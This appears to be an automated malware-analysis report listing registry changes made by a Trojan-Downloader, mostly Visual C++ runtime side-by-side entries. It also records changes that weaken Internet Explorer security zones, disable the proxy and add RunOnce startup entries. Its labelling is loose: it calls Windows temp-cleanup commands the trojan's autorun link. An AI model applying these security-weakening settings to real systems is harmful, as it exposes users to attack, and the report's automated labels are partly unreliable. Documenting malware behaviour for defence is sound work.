The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process InstAsm.exe:3332 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"ShortName" = "X86_MI~2.405"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"Identity" = "Microsoft.VC80.ATL,processorArchitecture=amd64,publicKeyToken=1fc8b3b9a1e18e3b,type=win32,version=8.0.50727.4053"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\8.0.50727.4053.Policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"ShortCatalogName" = "AMD64_~1.CAT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"ManifestSHA1Hash" = "02 F9 F1 3C B4 FA 95 B8 96 2C 63 22 88 6F AF 86"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"ShortManifestName" = "805072~1.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"ShortManifestName" = "X84004~1.MAN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Files\0]
"SHA1" = "AF 6E 52 0E 95 FE 6B D9 8C CF 2A F3 EB F1 0C 06"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"ShortName" = "805072~1.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Files\0]
"(Default)" = "msvcr80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\8.0.50727.4053.policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"ShortManifestName" = "AMD64_~2.MAN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Files\2]
"(Default)" = "msvcm80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\8.0.50727.4053.Policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Files\2]
"SHA1" = "34 F5 7D 3D 73 B2 81 0F A7 B5 DD C1 11 89 8F 13"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"Identity" = "Microsoft.VC80.CRT,processorArchitecture=x86,publicKeyToken=1fc8b3b9a1e18e3b,type=win32,version=8.0.50727.4053"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"ShortName" = "AMD64_~2.405"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd\Files\0]
"(Default)" = "ATL80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"ShortCatalogName" = "805072~1.CAT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"Identity" = "policy.8.0.Microsoft.VC80.CRT,processorArchitecture=x86,publicKeyToken=1fc8b3b9a1e18e3b,type=win32-policy,version=8.0.50727.4053"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\Microsoft.VC80.ATL.Manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\Files\0]
"(Default)" = "ATL80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"ShortName" = "805072~1.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd]
"Identity" = "Microsoft.VC80.ATL,processorArchitecture=x86,publicKeyToken=1fc8b3b9a1e18e3b,type=win32,version=8.0.50727.4053"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"ShortName" = "AMD64_~1.405"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"ShortName" = "805072~1.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"ShortCatalogName" = "805072~1.CAT"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 B8 43 14 89 53 9D 2F E7 0D A2 17 36 CF AA D9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"Identity" = "Microsoft.VC80.CRT,processorArchitecture=amd64,publicKeyToken=1fc8b3b9a1e18e3b,type=win32,version=8.0.50727.4053"
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Files\2]
"SHA1" = "A8 0D A7 44 A5 FA 77 C7 BE 3D 36 77 1B D6 23 FD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\8.0.50727.4053.policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"Identity" = "policy.8.0.Microsoft.VC80.ATL,processorArchitecture=amd64,publicKeyToken=1fc8b3b9a1e18e3b,type=win32-policy,version=8.0.50727.4053"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"ShortName" = "805072~3.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"ManifestSHA1Hash" = "AB 71 CE B9 08 61 FC 0D C9 A5 3D D0 9F 12 BD BA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\8.0.50727.4053.Policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Files\2]
"(Default)" = "msvcm80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Files\1]
"SHA1" = "67 8B F3 DA 5D 19 87 BB 88 FD 47 C4 80 1E CB 41"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"ManifestSHA1Hash" = "97 D7 B2 46 C8 71 05 C6 5B B7 FD B4 9C 41 0C BB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"ManifestSHA1Hash" = "A0 A0 FB D5 A5 56 F5 DE 3C C1 79 7D 55 CA 31 50"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"ShortManifestName" = "805072~1.POL"
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Files\0]
"(Default)" = "msvcr80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"ShortManifestName" = "805072~3.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Files\1]
"(Default)" = "msvcp80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd\Files\0]
"SHA1" = "99 84 0D CC 34 E7 8A F2 39 D8 08 41 EB A3 16 C1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd]
"ShortName" = "X86_MI~1.405"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"Identity" = "policy.8.0.Microsoft.VC80.ATL,processorArchitecture=x86,publicKeyToken=1fc8b3b9a1e18e3b,type=win32-policy,version=8.0.50727.4053"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd]
"ShortCatalogName" = "X8EAA8~1.CAT"
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"ManifestSHA1Hash" = "41 B9 78 58 8A 99 02 F5 E1 4B 2B 69 39 73 CB 21"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"ShortCatalogName" = "AMD64_~2.CAT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Files\0]
"SHA1" = "0A 38 B6 52 C9 D0 3C AA B8 03 C6 B2 50 5F A3 01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"ShortManifestName" = "AMD64_~1.MAN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd]
"ManifestSHA1Hash" = "2B 1A 5F D2 D6 54 C7 B7 B5 B9 59 FE 43 60 EE 65"
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\8.0.50727.4053.Policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"ShortCatalogName" = "805072~3.CAT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd]
"ShortManifestName" = "X86623~1.MAN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Files\1]
"(Default)" = "msvcp80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Files\1]
"SHA1" = "45 39 9C 26 97 A5 B2 E7 DB 02 2A 0E 4B 71 19 6F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"ManifestSHA1Hash" = "F3 12 F4 44 C1 E5 A5 25 D6 51 C2 71 C1 BA 7F 24"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"ShortCatalogName" = "805072~1.CAT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"ShortManifestName" = "805072~1.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"ManifestSHA1Hash" = "12 C3 31 19 86 23 33 23 2F 8F D4 E4 F2 83 41 F9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\Files\0]
"SHA1" = "6D 7C E3 7B 57 53 AA 3F 8B 6C 2C 81 70 01 1B 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\Microsoft.VC80.ATL.Manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"ShortCatalogName" = "X8E97F~1.CAT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"Identity" = "policy.8.0.Microsoft.VC80.CRT,processorArchitecture=amd64,publicKeyToken=1fc8b3b9a1e18e3b,type=win32-policy,version=8.0.50727.4053"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 842843" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\842843"

"WinSideBySideSetupCleanup 800656" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\800656"

"WinSideBySideSetupCleanup 806309" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\806309"

"WinSideBySideSetupCleanup 816749" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\816749"

"WinSideBySideSetupCleanup 761294" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\761294"

"WinSideBySideSetupCleanup 825721" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\825721"

"WinSideBySideSetupCleanup 732509" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\732509"

"WinSideBySideSetupCleanup 776418" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\776418"

The Trojan-Downloader deletes the following value(s) in system registry:
The Trojan-Downloader disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 825721"

"WinSideBySideSetupCleanup 732509"

"WinSideBySideSetupCleanup 761294"

"WinSideBySideSetupCleanup 776418"

"WinSideBySideSetupCleanup 806309"

"WinSideBySideSetupCleanup 842843"

"WinSideBySideSetupCleanup 800656"

"WinSideBySideSetupCleanup 816749"

The process MiniThunderPlatform.exe:2060 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
